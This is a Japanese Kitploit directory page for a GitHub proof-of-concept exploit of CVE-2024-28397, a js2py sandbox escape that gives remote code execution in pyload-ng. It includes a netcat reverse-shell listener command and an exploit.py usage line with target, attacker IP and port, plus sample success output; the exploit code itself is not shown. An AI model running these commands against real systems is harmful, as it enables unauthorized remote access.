Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py- — CVE-2024-28397 の PoC エクスプロイト – js2py サンドボックスエスケープによる pyload-ng のリモートコード実行 | Kitploit
ツール/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
脆弱性分析エクスプロイトウェブアプリケーション悪用
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

CVE-2024-28397 の PoC エクスプロイト – js2py サンドボックスエスケープによる pyload-ng のリモートコード実行

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
1ヶ月前未レビュー

リモートコード実行 – CVE-2024-28397 (pyload-ng / js2py)

このリポジトリには、js2py の安全でない使用に起因し pyload-ng に影響を与えるリモートコード実行脆弱性 CVE-2024-28397 の Proof-of-Concept (PoC) エクスプロイトが含まれています。

免責事項:
この PoC は教育および研究目的のみで使用してください。
所有していないシステム、またはテストする明示的な許可を得ていないシステムでは使用しないでください。
作者は、このコードの誤用について一切責任を負いません。


脆弱性の詳細

  • CVE ID: CVE-2024-28397
  • コンポーネント: pyload-ng の js2py
  • 影響: リモートコード実行 (RCE)
  • 攻撃ベクトル: 悪意のある JS ペイロードが js2py サンドボックスをエスケープし、任意のシステムコマンドを実行します。

要件とセットアップ

リバースシェルを受け取るには、Python 3.x、requests ライブラリ、および netcat が必要です。

  • ターゲット → /run_code エンドポイントにアクセス可能な脆弱な pyload-ng インスタンス

リスナー → エクスプロイト実行前に起動:

nc -lvnp 4444

使用方法:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

出力例:

  • [+] 登録に成功しました!
  • [+] ログインに成功しました
  • [+] エクスプロイトが成功しました
ツールをダウンロード